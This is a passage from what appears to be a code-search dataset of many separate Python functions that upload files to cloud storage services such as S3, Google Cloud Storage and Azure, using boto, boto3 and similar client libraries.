\\n\".format(eachfiledic[\"filepath\"]) )\n if self.multiPartUpload(eachfiledic) == True:\n eachfiledic[\"uploadedSuccess\"] = 1\n allfilesuploadedcount = allfilesuploadedcount + 1\n\n\n elif eachfiledic[\"uploadedSuccess\"] == 1: #Means it got uploaded in the last run.\n allfilesuploadedcount = allfilesuploadedcount + 1\n\n self.saveStateOfThisRun()\n if len(self.fileTobeUploaded) == allfilesuploadedcount: #Means we uploaded all files in the queue\n return True\n else:\n return False", "def _s3_intermediate_upload(file_obj, file_name, fields, session, callback_url):\n import boto3\n from boto3.s3.transfer import TransferConfig\n from boto3.exceptions import S3UploadFailedError\n\n # actually do the upload\n client = boto3.client(\n \"s3\",\n aws_access_key_id=fields[\"upload_aws_access_key_id\"],\n aws_secret_access_key=fields[\"upload_aws_secret_access_key\"],\n )\n\n multipart_chunksize = _choose_boto3_chunksize(file_obj)\n\n # if boto uses threads, ctrl+c won't work\n config = TransferConfig(use_threads=False, multipart_chunksize=multipart_chunksize)\n\n # let boto3 update our progressbar rather than our FASTX wrappers, if applicable\n boto_kwargs = {}\n\n if hasattr(file_obj, \"progressbar\"):\n boto_kwargs[\"Callback\"] = file_obj.progressbar.update\n file_obj._progressbar = file_obj.progressbar\n file_obj.progressbar = None\n\n for attempt in range(1, 4):\n try:\n client.upload_fileobj(\n file_obj,\n fields[\"s3_bucket\"],\n fields[\"file_id\"],\n ExtraArgs={\"ServerSideEncryption\": \"AES256\"},\n Config=config,\n **boto_kwargs\n )\n break\n except S3UploadFailedError as e:\n logging.debug(\"Caught S3UploadFailedError on attempt {}/3: {}\".format(attempt, str(e)))\n logging.error(\n \"{}: Connectivity issue, retrying upload via intermediary ({}/3)...\".format(\n file_name, attempt\n )\n )\n\n # rewind the progressbar if possible, then remove so boto3 can update the bar directly\n if hasattr(file_obj, \"_progressbar\"):\n file_obj.progressbar = file_obj._progressbar\n file_obj.seek(0)\n file_obj.progressbar = None\n else:\n file_obj.seek(0)\n else:\n logging.debug(\"{}: exhausted all retries via intermediary\")\n raise_connectivity_error(file_name)\n\n # issue a callback\n try:\n resp = session.post(\n callback_url,\n json={\n \"s3_path\": \"s3://{}/{}\".format(fields[\"s3_bucket\"], fields[\"file_id\"]),\n \"filename\": file_name,\n \"import_as_document\": fields.get(\"import_as_document\", False),\n },\n )\n except requests.exceptions.ConnectionError:\n raise_connectivity_error(file_name)\n\n if resp.status_code != 200:\n raise_connectivity_error(file_name)\n\n try:\n return resp.json()\n except ValueError:\n return {}", "def pushToS3()-> None:\n logging.info(f\"Connecting to s3 {getTime()}\")\n s3 = boto3.client(\"s3\",endpoint_url=\"http://localhost:4566\")\n if(not s3.head_bucket(Bucket=\"demo\")):\n s3.create_bucket(Bucket='demo')\n try:\n logging.info(f\"Uploading to s3 {getTime()}\")\n s3.upload_file(\"result.csv\",\"demo\",\"result.csv\")\n logging.info(f\"Finished uploding to s3 {getTime()}\")\n except ClientError as e:\n logging.error(f\"Error uploading file to S3 {getTime()}\")", "def upload_s3_file(key, bucket, filename):\n s3_client = boto3.client('s3')\n s3_client.upload_file(filename, bucket, key)\n return True", "def _upload_blob(self, source_file_path):\n\n if os.path.exists(source_file_path) and os.path.isfile(source_file_path):\n destination_blob_name = os.path.basename(source_file_path)\n\n bucket = self._storage_client.bucket(self._bucket_name)\n blob = 
bucket.blob(destination_blob_name)\n\n blob.upload_from_filename(source_file_path)\n\n print(f'File {destination_blob_name} uploaded to {blob.path}')\n else:\n error_message = f'{source_file_path} does not exist.'\n raise FileNotFoundError(error_message)", "def upload_file(conn, filename_local, filename_s3, gzip=False):\n\n filename_s3 = filename_s3.lstrip('./')\n\n file_descriptor = open(filename_local, 'rb')\n content = file_descriptor.read()\n\n content_type = _get_content_type(file_descriptor)\n headers = _get_headers(content_type)\n\n #should compress if the file is compressable and gzip is enabled\n can_be_gzipped = _file_can_be_compressed(filename_local)\n if gzip and can_be_gzipped:\n content = _compress_string(content)\n headers['Content-Length'] = str(len(content))\n headers['Content-Encoding'] = 'gzip'\n extension = mimetypes.guess_extension(content_type)\n #we should not overwrite the original file in the server.\n #We change extensions: style.css --> style.gz.css, for instance\n filename_s3 = filename_s3.rstrip(extension) + '.gz' + extension\n\n #if gzip is enabled and it is not compressable, don't upload nothing at all\n elif gzip and not can_be_gzipped:\n return\n\n #upload\n print 'Uploading %s to %s' % (filename_local, filename_s3)\n _put(conn, filename_s3, content, headers=headers)\n file_descriptor.close()", "def upload_to_s3(file_name, bucket, key): \n s3 = boto3.resource('s3') \n try:\n s3.meta.client.upload_file(file_name, bucket, key)\n print(\"s3 upload success -- uploaded \" + file_name + \" to the bucket: \" + bucket)\n except ClientError as e:\n logging.error(e)\n return False\n print(\"s3 upload error occurs\", e)\n return True", "def upload_file(file_name, object_name=None, bucket = BUCKET_NAME):\n\n # Upload the file\n s3_client = boto3.client('s3')\n try:\n response = s3_client.upload_file(file_name, bucket, object_name) if type(file_name) == str else s3_client.upload_fileobj(file_name, BUCKET_NAME, object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True", "def upload(self, file_path, bucket_name, file_name):\n\n self.client.upload_file(file_path, bucket_name, file_name)", "def push_file_to_s3(logger, app_config, s3_object_info, start_timing):\n import boto3\n s3_resource = boto3.resource('s3')\n logging.getLogger('boto3').addHandler(logger)\n s3_object = get_config_item(app_config, 's3_info.object_base') + \\\n '/' + s3_object_info['camera_name'] + '/' + \\\n s3_object_info['date_string'] + '/' + \\\n s3_object_info['hour_string'] + '/' + \\\n s3_object_info['img_type'] + '/' + \\\n s3_object_info['just_file']\n\n utc_ts = int(time.time() * 1000)\n\n object_metadata = {'camera': s3_object_info['camera_name'],\n 'camera_timestamp': str(utc_ts)}\n s3_resource.Object(get_config_item(app_config, 's3_info.bucket_name'),\n s3_object).put(Body=open(s3_object_info['file_name'], 'rb'),\n Metadata=object_metadata)\n totaltime = time.time() - start_timing\n logger.info(\"S3 Object: {} written to s3 in {} seconds.\".format(s3_object, totaltime))\n return utc_ts", "def _copy_local_to_s3(src: str, dest_bucket: str, dest_key: str)->bool:\n s3_client = boto3.client('s3')\n try:\n response = s3_client.upload_file(src, dest_bucket, dest_key)\n except Exception as exc:\n raise Error(\"Error {} occurred while working on local object to s3.\".format(exc))\n \n return True", "def aws_s3_upload(self):\n\n # absolute path to the csv file to create\n csv_file = os.path.join(self.csvfile, \"DLTINS_20210117_01of01.csv\")\n\n # Test for correct data\n 
self.assertTrue(\n aws_s3_upload(\n csv_file,\n self.region_name,\n self.aws_access_key_id,\n self.aws_secret_access_key,\n self.bucket_name,\n )\n )\n\n # Test for non existent bucket\n self.assertFalse(\n aws_s3_upload(\n csv_file,\n \"useast\",\n self.aws_access_key_id,\n self.aws_secret_access_key,\n self.bucket_name,\n )\n )\n\n # Test for non existent region\n self.assertFalse(\n aws_s3_upload(\n csv_file,\n self.region_name,\n self.aws_access_key_id,\n self.aws_secret_access_key,\n \"nonexistentbucketname\",\n )\n )\n\n # Test for incorrect keys\n self.assertFalse(\n aws_s3_upload(\n csv_file,\n self.region_name,\n \"xjvachiahvlchabo;jvbo\",\n \"khkc vah haaih aih ika\",\n self.bucket_name,\n )\n )", "def upload_to_storage_client(self, **kwargs):\n if 'source_path' in kwargs:\n source_path = kwargs.get('source_path')\n else:\n raise ValueError(\"Must provide the \\'source_path\\' parameter for local storage client to find the file!\")\n\n if 'destination_path' in kwargs:\n destination_path = kwargs.get('destination_path')\n else:\n raise ValueError(\n \"Must provide the \\'destination_path\\' parameter for local storage client to find the destination!\")\n\n compression = kwargs.get('compression')\n intended_stored_file_name = kwargs.get('intended_stored_file_name', None)\n\n if not os.path.isdir(source_path) and compression:\n raise ValueError(\"Only directories can be zipped. Single files cannot be zipped.\")\n\n self.__check_dir(destination_path)\n\n upload_parameters = {'source_path': source_path, 'compression': compression,\n 'destination_path': destination_path}\n\n if compression:\n # TODO\n # if no name is supplied, name of the zipfile will be the destination; currently funky at move() due to source =/= location\n if not intended_stored_file_name:\n file_name = os.path.split(source_path)[-1]\n intended_stored_file_name = 'archive_' + file_name + \"_\" + datetime.now().strftime(\"%A_%d_%B_%Y_%I_%M%p\")\n upload_parameters['intended_stored_file_name'] = intended_stored_file_name\n\n # compression can only happen on DIRECTORIES, and not on single files\n # compress2 takes a name from the kwargs, and source from parameter of save_local\n compress(intended_stored_file_name, source_path)\n\n # TODO: Perhaps zipfile dumping location can be found by getting a parent/ child from source\n\n # To find where compress2 dumps zipfile, currently: working directory path\n location = self.__prj_root_dir + \"\\\\\" + intended_stored_file_name + \".zip\"\n shutil.move(location, destination_path)\n\n upload_parameters['intended_stored_file_name'] = intended_stored_file_name\n upload_parameters['upload_date_time'] = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n self.generate_json_upload_parameters(**upload_parameters)\n else:\n upload_parameters['intended_stored_file_name'] = intended_stored_file_name\n upload_parameters['upload_date_time'] = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n shutil.move(source_path, destination_path)\n self.generate_json_upload_parameters(**upload_parameters)", "def _upload(self, errors):\n if self.backup_bucket is None:\n return\n\n try:\n with open(\"%s/%s.tar.gz\"%(self.backup_path, self.name), 'r+') as f:\n s3upload.upload_to_s3(f,\n self.backup_bucket,\n \"%s/%s.tar.gz\"%(self.backup_id, self.name))\n\n # Cleaning up resources, since the upload was successful\n run(\"rm -f %s/%s.tar.gz\"%(self.backup_path, self.name))\n except Exception as e:\n logging.exception(e)\n errors.put(Exception(\"Error uploading %s server backup to S3\" % self.name))\n 
traceback.print_exc()", "def _upload_dir_to_bucket(self, path, ext_path):\n for file in os.listdir(path):\n self._upload_to_bucket(path+'/'+file, ext_path+'/'+file)", "def upload(conn, localpath, remotepath, filter = None, ignore_invalid = False, chunk_size = 16000):\n if os.path.isdir(localpath):\n upload_dir(conn, localpath, remotepath, filter, chunk_size)\n elif os.path.isfile(localpath):\n upload_file(conn, localpath, remotepath, chunk_size)\n else:\n if not ignore_invalid:\n raise ValueError(\"cannot upload %r\" % (localpath,))", "def _upload_file_to_aws(aws_upload_details):\n # Step 1: get the request signed\n sig_uri = aws_upload_details['signature']\n\n now = dt.datetime.utcnow()\n expires = now + dt.timedelta(hours=1)\n now_ts = timegm(now.timetuple())\n key = 'data_imports/%s.%s' % (filename, now_ts)\n\n payload = {}\n payload['expiration'] = expires.isoformat() + 'Z'\n payload['conditions'] = [\n {'bucket': aws_upload_details['aws_bucket_name']},\n {'Content-Type': 'text/csv'},\n {'acl': 'private'},\n {'success_action_status': '200'},\n {'key': key}\n ]\n\n sig_result = requests.post(main_url + sig_uri,\n headers=upload_header,\n data=json.dumps(payload))\n if sig_result.status_code != 200:\n msg = \"Something went wrong with signing document.\"\n raise RuntimeError(msg)\n else:\n sig_result = sig_result.json()\n\n # Step 2: upload the file to S3\n upload_url = \"http://%s.s3.amazonaws.com/\" % (aws_upload_details['aws_bucket_name'])\n\n # s3 expects multipart form encoding with files at the end, so this\n # payload needs to be a list of tuples; the requests library will encode\n # it property if sent as the 'files' parameter.\n s3_payload = [\n ('key', key),\n ('AWSAccessKeyId', aws_upload_details['aws_client_key']),\n ('Content-Type', 'text/csv'),\n ('success_action_status', '200'),\n ('acl', 'private'),\n ('policy', sig_result['policy']),\n ('signature', sig_result['signature']),\n ('file', (filename, open(upload_filepath, 'rb')))\n ]\n\n result = requests.post(upload_url,\n files=s3_payload)\n\n if result.status_code != 200:\n msg = \"Something went wrong with the S3 upload: %s \" % result.reason\n raise RuntimeError(msg)\n\n # Step 3: Notify SEED about the upload\n completion_uri = aws_upload_details['upload_complete']\n completion_payload = {\n 'import_record': upload_dataset_id,\n 'key': key,\n 'source_type': upload_datatype\n }\n return requests.post(main_url + completion_uri,\n headers=upload_header,\n data=completion_payload)", "def upload_file(file_name, bucket, object_name='patients.log'):\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_name\n # Upload the file\n s3_client = boto3.client('s3')\n try:\n response = s3_client.upload_file(file_name, bucket, object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True", "def preprocess(event, context):\n # create file in DDB\n file_id = utils.generate_id()\n file_request = json.loads(event.get('body'))\n FileModel.create({\n 'id': file_id,\n 'name': file_request.get('name')\n })\n LOGGER.debug('Files item created. service=ddb method=put_item id={}'.format(file_id))\n # generate signed URL for posting file\n url = S3_CLIENT.generate_presigned_url(\n ClientMethod='put_object',\n Params={\n 'Bucket': runtime_context.BUCKET_NAME,\n 'Key': file_id\n },\n ExpiresIn=runtime_context.EXPIRATION\n )\n LOGGER.debug('Presigned URL generated. 
service=s3 method=put_object id={}'.format(file_id))\n # send back the signed url\n return {\n \"statusCode\": 200,\n \"body\": json.dumps({\n 'id': file_id,\n 'url': url\n }),\n # CORS header\n \"headers\": {\n \"Access-Control-Allow-Origin\": \"*\"\n }\n }", "def upload_file(file_name, bucket):\r\n object_name = file_name\r\n s3_client = boto3.client('s3')\r\n response = s3_client.upload_file(file_name, bucket, object_name)\r\n\r\n return response", "def upload_file(self, source, dest):\n print(f\"Uploading {source} to {dest}\")\n with open(source, \"rb\") as data:\n self.client.upload_blob(name=dest, data=data)", "def main():\n arg_parser = argparse.ArgumentParser(description='Transfer data files to AWS S3 bucket.')\n arg_parser.add_argument('mission', action='store', help='Mission data to be transferred.')\n arg_parser.add_argument('target', action='store', help='Which AWS account to receive data.')\n args = arg_parser.parse_args()\n mission = args.mission\n target = args.target.upper()\n\n config = configparser.ConfigParser()\n config.read('aws.ini')\n bucket = config[target]['bucket']\n access_key_id = config[target]['access_key']\n secret_key_id = config[target]['secret_key']\n\n source_dir = os.path.join(OUTBOUND, mission)\n dir_list = get_target_list(source_dir)\n for directory in dir_list:\n if directory.endswith('_TIF'):\n file_dir = os.path.join(source_dir, directory)\n files = get_target_list(file_dir)\n for file in files:\n upload_to_aws(file_dir + file, bucket, mission + f'/{directory}/{file}',\n access_key_id, secret_key_id)", "def _cloud_storage_upload(local_file, bucket, filename_on_bucket):\n client = storage.Client()\n\n bucket = client.get_bucket(bucket)\n blob = bucket.blob(filename_on_bucket)\n blob.upload_from_filename(local_file)\n print('uploaded ', bucket, filename_on_bucket)", "def post(self):\n services.file.move_files(**request.json)\n return {\n \"status\": True\n }", "def upload_file(\n self, bucket_id: uplink.Path, filename: uplink.Path, file: uplink.Body\n ):\n pass", "def upload(bucket_name, source_file, destination_blob_name):\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n\n try:\n blob.upload_from_file(source_file)\n except:\n return None\n else:\n return('File {} uploaded to {}.'.format(\n source_file,\n destination_blob_name))", "def upload_file(Filename=None, Bucket=None, Key=None, ExtraArgs=None, Callback=None, Config=None):\n pass", "def upload_object(object_location: ObjectLocation, stream: io.BytesIO) -> None:\n s3 = boto3.client(\"s3\")\n result = s3.upload_fileobj(stream, object_location.bucket.name, object_location.key)\n log.debug(f\"Result of upload to {object_location}: {result}\")", "def upload_file(command):\n if 'action' not in command or command['action']!=\"UPLOAD\":\n raise ValueError(\"Command not of type UPLOAD\")\n if 'file_pattern' not in command: \n raise ValueError(\"Missing file pattern\")\n path = command['file_pattern'] \n if not os.path.exists(path):\n raise ValueError(\"No valid file for upload found\")\n returner={}\n handler = Layer1(aws_access_key_id = command['access_key'],aws_secret_access_key = command['secret_access_key'],region_name=command['region_name'])\n uploader = ConcurrentUploader(handler,command['vault_name'],part_size=uchunk)\n file_size = os.path.getsize(path)\n if file_size==0:\n raise ValueError(\"File is empty. 
Nothing to upload.\")\n csum = chunkedmd5(path)\n itime=time.time()\n file_name = os.path.basename(path)\n machine_id = str(command['target']) if client_name == '' else client_name+' ('+str(command['target']) + ')'\n #Construct a meaningful description object for the file\n #The limits are that the description can be no more than 1024 characters in length and must use only ascii characters between 32 and 126 (i.e., 32<=ord(char)<=126)\n dscrip = command['description']+'\\\\n'\n dscrip = dscrip + \"Uploaded at \"+str(itime)+'\\\\n'+ \"Full path \"+str(path)+'\\\\n'+ \"File size \"+str(file_size)+'\\\\n' + \"MD5 \"+str(csum)+'\\\\n' + \"Source machine id \"+machine_id+'\\\\n'\n print \"Uploading file %s\"%file_name\n #Put some validation stuff here...\n #Do the upload\n archive_id = uploader.upload(path,dscrip)\n print \"Completed successfully. Archive ID: %s\"%archive_id\n #Done the upload, send the bastard back\n returner['archive_id'] = archive_id\n returner['description'] = dscrip\n returner['file_name'] = file_name\n returner['true_path'] = path\n returner['file_size'] = file_size\n returner['md5sum'] = csum\n returner['insert_time']=int(itime)\n returner['region_name']=command['region_name']\n returner['vault_name'] = command['vault_name']\n return returner", "def upload_file(file_name: str, bucket: str, object_name: str =None) -> None:\n\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_name\n\n # Upload the file\n s3_client = boto3.client(\"s3\")\n try:\n s3_client.upload_file(file_name, bucket, object_name)\n except ClientError as e:\n logging.error(e)", "def upload_file_by_url(s3_file_name, filename):\n full_path = os.path.join(CONFIG_BROKER['path'], \"tests\", \"integration\", \"data\", filename)\n\n if CONFIG_BROKER['local']:\n # If not using AWS, put file submission in location\n # specified by the config file\n broker_file_path = CONFIG_BROKER['broker_files']\n copy(full_path, broker_file_path)\n submitted_file = os.path.join(broker_file_path, filename)\n return {'bytesWritten': os.path.getsize(submitted_file), 's3FileName': full_path}\n else:\n # Use boto to put files on S3\n s3conn = boto.s3.connect_to_region(CONFIG_BROKER[\"aws_region\"])\n bucket_name = CONFIG_BROKER['aws_bucket']\n key = Key(s3conn.get_bucket(bucket_name))\n key.key = s3_file_name\n bytes_written = key.set_contents_from_filename(full_path)\n return {'bytesWritten': bytes_written, 's3FileName': s3_file_name}", "def upload(args):\n osf = _setup_osf(args)\n if osf.username is None or osf.password is None:\n sys.exit('To upload a file you need to provide a username and'\n ' password.')\n\n project = osf.project(args.project)\n storage, remote_path = split_storage(args.destination)\n if remote_path == '':\n remote_path = os.path.split(args.source)[-1]\n\n store = project.storage(storage)\n if args.recursive:\n if not os.path.isdir(args.source):\n raise RuntimeError(\"Expected source ({}) to be a directory when \"\n \"using recursive mode.\".format(args.source))\n\n # local name of the directory that is being uploaded\n _, dir_name = os.path.split(args.source)\n\n for root, _, files in os.walk(args.source):\n subdir_path = os.path.relpath(root, args.source)\n for fname in files:\n local_path = os.path.join(root, fname)\n with open(local_path, 'rb') as fp:\n # build the remote path + fname\n name = os.path.join(remote_path, dir_name, subdir_path,\n fname)\n store.create_file(name, fp, force=args.force,\n update=args.update)\n\n else:\n with open(args.source, 
'rb') as fp:\n store.create_file(remote_path, fp, force=args.force,\n update=args.update)", "def upload_blob(bucket_name, source_file_name, destination_blob_name):\n bucket_name = \"teststorechakra\"\n source_file_name = \"/Users/demo/Documents/learn/gcp/Setting_gcp_datalabs.sh\"\n destination_blob_name = \"testcloud sdk\"\n\n storage_client = storage.Client()\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n\n blob.upload_from_filename(source_file_name)\n\n print(\n \"File {} uploaded to {}.\".format(\n source_file_name, destination_blob_name\n )\n )", "def upload(\n bucket: str, key: str, filename: str, session: Optional[boto3.Session] = None\n) -> None:\n s3_client = _get_client(session)\n LOGGER.info(\"uploading %s to s3://%s/%s...\", filename, bucket, key)\n s3_client.upload_file(Filename=filename, Bucket=bucket, Key=key)", "def upload_file_to_s3(self, file_data):\r\n\r\n file_key = file_data.name + datetime.now(UTC).strftime(\r\n xqueue_interface.dateformat\r\n )\r\n\r\n file_data.seek(0)\r\n s3_public_url = upload_to_s3(\r\n file_data, file_key, self.s3_interface\r\n )\r\n\r\n return s3_public_url", "def upload_from_path_to_s3(file_path):\n bucket_name = \"alp-reports-lambda\"\n environment = \"dev\" if os.environ.get('LOCAL') else \"prod\"\n object_key = f\"{environment}/835/{file_path.split('/')[-1]}\"\n\n s3 = boto3.resource('s3')\n s3.Object(bucket_name, object_key).upload_file(file_path, ExtraArgs={'ACL': 'public-read'})\n\n return f\"https://s3.amazonaws.com/{bucket_name}/{object_key}\"", "def _upload(\n self,\n client: demisto_client,\n marketplace: MarketplaceVersions,\n ) -> None:\n try:\n upload_method = self._client_upload_method(client=client)\n except NotImplementedError as e:\n raise NotImplementedError(\n f\"missing overriding upload method for {self.content_type}\"\n ) from e\n\n with TemporaryDirectory() as f:\n dir_path = Path(f)\n self.dump(\n dir_path,\n marketplace=marketplace,\n )\n response = upload_method(dir_path / self.normalize_name)\n parse_upload_response(\n response, path=self.path, content_type=self.content_type\n ) # raises on error", "async def upload_file(\n location_id: LocationID,\n file_id: StorageFileID,\n file_size: ByteSize | None,\n link_type: LinkType = LinkType.PRESIGNED,\n is_directory: bool = False,\n):", "def upload_blob(bucket_name, source_file_name, destination_blob_name):\r\n bucket_name = \"my-photos\"\r\n source_file_name = \"./puppy.png\"\r\n estination_blob_name = \"puppy01\"\r\n\r\n storage_client = storage.Client()\r\n bucket = storage_client.bucket(bucket_name)\r\n blob = bucket.blob(destination_blob_name)\r\n\r\n blob.upload_from_filename(source_file_name)\r\n\r\n print(\r\n \"File {} uploaded to {}.\".format(\r\n source_file_name, destination_blob_name\r\n )\r\n )", "def upload_file(self, source, destination, overwrite=True, parallelism=1,\n **kwargs):\n c = self.get_conn()\n c.upload(hdfs_path=destination,\n local_path=source,\n overwrite=overwrite,\n n_threads=parallelism,\n progress=self.progress,\n **kwargs)\n logging.debug(\"Uploaded file {} to {}\".format(source, destination))", "def upload_blob(source_file_name, destination_blob_name, is_redact=False):\n # source_file_name = \"local/path/to/file\"\n # destination_blob_name = \"storage-object-name\"\n\n storage_client = storage.Client()\n \n # storage the file in the right bucket\n bucket_name = PUBLIC_BUCKET if is_redact else PRIVATE_BUCKET\n bucket = storage_client.bucket(bucket_name)\n blob = 
bucket.blob(destination_blob_name)\n blob.upload_from_filename(source_file_name)", "def upload_blob(bucket_name, source_file_name, destination_blob_name):\n\n storage_client = storage.Client()\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n\n blob.upload_from_filename(source_file_name)\n\n print(\n \"File {} uploaded to {}.\".format(\n source_file_name, destination_blob_name\n )\n )", "def _openstack_file_upload_handler(self, real_file_path, file_path, file_name, **kwargs):\r\n\r\n container = kwargs.get('container', None)\r\n connection = kwargs.get('connection', None)\r\n\r\n if container is None:\r\n raise TypeError('container argument is required')\r\n\r\n if connection is None:\r\n raise TypeError('connection argument is required')\r\n\r\n object_key = (os.path.relpath(file_path, '/') + '/' + file_name).replace('\\\\', '/')\r\n if not object_key.startswith('/'):\r\n object_key = '/' + object_key\r\n\r\n remove_from_key = kwargs.get('remove_from_key', None)\r\n if remove_from_key is not None:\r\n object_key = object_key.replace(remove_from_key, '')\r\n\r\n prefix = kwargs.get('prefix', '')\r\n if prefix is None:\r\n prefix = ''\r\n if prefix != '' and not prefix.endswith('/'):\r\n prefix += '/'\r\n\r\n object_key = prefix + object_key\r\n\r\n real_file_path = real_file_path.replace('\\\\', '/')\r\n self._upload_file_to_container(container, object_key, real_file_path, connection)", "def upload_file(file_name, bucket_name, object_name=None):\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = os.path.basename(file_name)\n\n try:\n # Upload the file\n response = s3.upload_file(file_name, bucket_name, object_name)\n # Get list of files in bucket to confirm\n describe_objects(bucket_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True", "def upload_file(file_name, bucket, object_name=None):\n\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_name\n\n # Upload the file\n try:\n response = s3_client.upload_file(file_name, bucket, object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True", "def file_upload(self, bucket_id, file_path, tmp_file_path):\n\n self.__logger.debug('Upload %s in bucket %s', file_path, bucket_id)\n self.__logger.debug('Temp folder %s', tmp_file_path)\n\n bname = os.path.split(file_path)[1] # File name\n\n file_mime_type = 'text/plain'\n\n # Encrypt file\n self.__logger.debug('Encrypting file...')\n\n file_crypto_tools = FileCrypto()\n\n # File name of encrypted file\n file_name_ready_to_shard_upload = '%s.encrypted' % bname\n # Path where to save the encrypted file in temp dir\n file_path_ready = os.path.join(tmp_file_path,\n file_name_ready_to_shard_upload)\n self.__logger.debug('file_path_ready: %s', file_path_ready)\n\n # Begin file encryption\n file_crypto_tools.encrypt_file(\n 'AES',\n file_path,\n file_path_ready,\n self.client.password)\n\n self.fileisdecrypted_str = ''\n\n file_size = os.stat(file_path).st_size\n self.__logger.info('File encrypted')\n\n # Get the PUSH token from Storj Bridge\n self.__logger.debug('Get PUSH Token')\n\n push_token = None\n try:\n push_token = self.client.token_create(bucket_id, 'PUSH')\n except BridgeError as e:\n self.__logger.error(e)\n self.__logger.debug('PUSH token create exception')\n self.__logger.error('File not uploaded')\n return\n\n self.__logger.info('PUSH Token ID %s', push_token.id)\n\n # Get a frame\n 
self.__logger.debug('Frame')\n frame = None\n\n try:\n frame = self.client.frame_create()\n except BridgeError as e:\n self.__logger.error(e)\n self.__logger.debug('Unhandled exception while creating file \\\nstaging frame')\n self.__logger.error('File not uploaded')\n return\n\n self.__logger.info('frame.id = %s', frame.id)\n\n # Now generate shards\n self.__logger.debug('Sharding started...')\n shards_manager = model.ShardManager(filepath=file_path_ready,\n tmp_path=tmp_file_path)\n self.all_shards_count = len(shards_manager.shards)\n\n self.__logger.debug('Sharding ended...')\n\n self.__logger.info('There are %s shards', self.all_shards_count)\n\n # Calculate timeout\n self._calculate_timeout(shard_size=shards_manager.shards[0].size,\n mbps=1)\n\n # Upload shards\n mp = ThreadPool()\n res = mp.map(lambda n_s: self.upload_shard(\n n_s[1], n_s[0], frame, file_name_ready_to_shard_upload, tmp_file_path),\n enumerate(shards_manager.shards))\n\n self.__logger.debug('===== RESULTS =====')\n self.__logger.debug(res)\n if False in res or None in res:\n self.__logger.error('File not uploaded: shard %s not uploaded' %\n res.index(False))\n self.__logger.error('Exiting with errors')\n exit(1)\n # finish_upload\n self.__logger.debug('Generating HMAC...')\n\n # create file hash\n hash_sha512_hmac_b64 = self._prepare_bucket_entry_hmac(\n shards_manager.shards)\n hash_sha512_hmac = hashlib.sha224(str(\n hash_sha512_hmac_b64['SHA-512'])).hexdigest()\n\n self.__logger.debug('Now upload file')\n data = {\n 'x-token': push_token.id,\n 'x-filesize': str(file_size),\n 'frame': frame.id,\n 'mimetype': file_mime_type,\n 'filename': str(bname) + str(self.fileisdecrypted_str),\n 'hmac': {\n 'type': 'sha512',\n 'value': hash_sha512_hmac\n },\n }\n\n self.__logger.debug('Finishing upload')\n self.__logger.debug('Adding file %s to bucket...', bname)\n\n success = False\n try:\n # Post an upload_file request\n response = self.client._request(\n method='POST',\n path='/buckets/%s/files' % bucket_id,\n headers={\n 'x-token': push_token.id,\n 'x-filesize': str(file_size),\n },\n json=data,\n )\n success = True\n\n except BridgeError as e:\n self.__logger.error(e)\n self.__logger.debug('Unhandled bridge exception')\n\n if success:\n self.__logger.info('File uploaded successfully!')\n\n # Remove temp files\n try:\n # Remove shards\n file_shards = map(lambda i: '%s-%s' % (file_path_ready, i),\n range(1, self.all_shards_count + 1))\n self.__logger.debug('Remove shards %s' % file_shards)\n map(os.remove, file_shards)\n # Remove encrypted file\n self.__logger.debug('Remove encrypted file %s' % file_path_ready)\n os.remove(file_path_ready)\n except OSError as e:\n self.__logger.error(e)", "def put(self, file_path, key=None):\n try:\n key_name = key if key else os.path.basename(file_path)\n size = os.stat(file_path).st_size\n if size < 104857600: #100 mb\n k = Key(self.bucket)\n k.key = key_name\n sent = k.set_contents_from_filename(file_path)\n log.info('Uploading %s to S3 (%s)' % (key_name, self.bucket_name))\n return sent == size\n else:\n log.info('Multipart Uploading %s to S3 (%s)' % (key_name, self.bucket_name))\n mp = self.bucket.initiate_multipart_upload(key_name)\n chunk_size = 52428800\n chunk_count = int(math.ceil(size / float(chunk_size)))\n #Send the file parts, using FileChunkIO to create a file-like object\n # that points to a certain byte range within the original file. 
We\n # set bytes to never exceed the original file size.\n for i in range(chunk_count):\n offset = chunk_size * i\n bytes = min(chunk_size, size - offset)\n with FileChunkIO(file_path, 'r', offset=offset, bytes=bytes) as fp:\n mp.upload_part_from_file(fp, part_num=i + 1)\n # Finish the upload\n mp.complete_upload()\n return True\n except Exception, e:\n log.error('Failed to upload to S3 (%s)' % (self.bucket_name), exc_info=True)\n return False", "def upload_file(file_name, bucket, object_name=None):\n\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_name\n\n # Upload the file\n s3_client = boto3.client('s3', aws_access_key_id='', aws_secret_access_key='')\n try:\n response = s3_client.upload_file(file_name, bucket, object_name, ExtraArgs={'ACL':'public-read'})\n except ClientError as e:\n logging.error(e)\n return False\n return True", "def handle_upload(f, attrs):\n\n # chunked = False\n print 'UPLOAD DIRECTORY:', UPLOAD_DIRECTORY\n dest_folder = os.path.join(UPLOAD_DIRECTORY, attrs['qquuid'])\n dest = os.path.join(dest_folder, attrs['qqfilename'])\n save_upload(f, dest)", "def load_data_to_s3(frame_dir, preview_file_name, s3_bucket, frame_prefix, upload_frames, video_preview_prefix,\n working_dir):\n if upload_frames:\n count = 0\n frames_s3_prefix = frame_prefix + frame_dir.split('/')[-1]\n start = time.time()\n for frame in os.listdir(frame_dir):\n # this will upload the frame in vid_a/vid_a_000001.jpg to s3://bucket/frame-prefix/vid_a/vid_a_000001.jpg\n frame_local_path = os.path.join(frame_dir, frame)\n frame_s3_key = \"{}/{}\".format(frames_s3_prefix, frame)\n s3.Bucket(s3_bucket).upload_file(frame_local_path, frame_s3_key)\n count += 1\n if count % REPORT_STATUS == 0:\n logger.info(\"uploaded {} frames. 
